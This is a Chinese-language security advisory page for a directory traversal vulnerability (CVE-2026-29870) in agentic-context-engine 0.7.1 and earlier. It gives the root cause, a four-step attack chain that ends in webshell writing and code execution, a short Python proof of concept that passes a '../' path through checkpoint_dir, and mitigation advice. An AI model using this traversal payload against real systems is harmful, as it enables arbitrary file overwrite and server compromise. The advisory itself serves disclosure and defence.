CVE-2026-29870 CVSS 7.6 高危

CVE-2026-29870 agentic-context-engine目录遍历漏洞

披露日期: 2026-03-31

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-29870

漏洞类型

路径遍历

CVSS评分

7.6 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

agentic-context-engine

漏洞概述

agentic-context-engine项目0.7.1及之前版本存在目录遍历漏洞。由于`ace/skillbook.py`中的`save_to_file`方法未对文件系统路径进行规范化或验证，攻击者可利用`checkpoint_dir`参数中的遍历序列逃逸预期目录。该漏洞允许覆盖任意文件，可能导致应用损坏、权限提升或代码执行。

技术细节

该漏洞的根源在于`agentic-context-engine`项目在处理文件保存操作时缺乏必要的安全编码实践。具体而言，`OfflineACE.run`方法接受用户提供的`checkpoint_dir`参数，并将其传递给`ace/skillbook.py`中的`save_to_file`方法。在此过程中，程序未对输入路径进行规范化处理（Normalization）或验证其是否仍处于预期的沙箱目录内。攻击者可以通过在参数中插入“../”序列或绝对路径，绕过逻辑上的目录限制。一旦路径遍历成功，攻击者即可利用该漏洞向服务器上的任意位置写入数据。由于许多应用程序依赖特定的配置文件或库文件，覆盖这些文件可能导致应用程序行为被篡改，甚至允许攻击者注入恶意代码并执行，从而完全控制受影响的主机。

攻击链分析

STEP 1

侦察

攻击者识别出目标运行了agentic-context-engine且版本在0.7.1或以下。

STEP 2

漏洞利用

攻击者向`OfflineACE.run`接口发送请求，在`checkpoint_dir`参数中注入包含'../'的恶意路径，试图绕过目录限制。

STEP 3

写入恶意文件

由于`save_to_file`未进行路径校验，攻击者成功将文件写入到系统任意位置（如覆盖配置文件或写入Webshell）。

STEP 4

执行与控制

利用写入的恶意文件导致应用程序行为改变，触发权限提升或远程代码执行，从而控制服务器。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import os
from ace import OfflineACE

# Vulnerable Parameter: checkpoint_dir
# Using path traversal sequences (../) to escape the intended directory
malicious_payload = "../../../../tmp/malicious_file.txt"

# Initialize the engine
engine = OfflineACE()

# Trigger the vulnerability in OfflineACE.run
# The save_to_file method in ace/skillbook.py fails to normalize the path
# This will write to /tmp/malicious_file.txt instead of the checkpoint dir
try:
    engine.run(
        data="exploit_content",
        checkpoint_dir=malicious_payload
    )
    print("File written successfully via directory traversal.")
except Exception as e:
    print(f"Error: {e}")

影响范围

agentic-context-engine <= 0.7.1

防御指南

临时缓解措施

建议立即升级至修复版本。若无法升级，应在应用网关或代码层面拦截包含“../”或绝对路径的`checkpoint_dir`参数。同时，以最小权限原则运行应用程序，避免使用root或高权限用户运行服务，防止攻击者覆盖系统关键文件。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表